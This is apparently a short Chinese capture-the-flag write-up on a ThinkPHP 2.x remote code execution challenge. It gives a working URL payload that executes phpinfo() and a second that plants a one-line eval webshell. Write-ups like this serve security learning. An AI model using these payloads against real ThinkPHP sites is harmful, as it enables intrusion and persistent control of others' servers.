[ThinkPHP]2-Rce 1
启动实例发现是一个ThinkPHP的示例代码,根据题目判断这题为RCE
扫描器扫描,未发现存在的REC漏洞(根据题目以及扫描结果猜想,可能是2.x版本的rec)
构造payload,成功显示phpinfo页面
?s=/index/index/name/${phpinfo()}
唱跳rap篮球+F,直接找到flag
tips.有时候在phpinfo找不到,可以采用一句话木马形式
?s=/index/index/name/${@eval($_POST[123456])}
标签:index,name,phpinfo,扫描,ThinkPHP,Rce
From: https://www.cnblogs.com/tazmi/p/18537449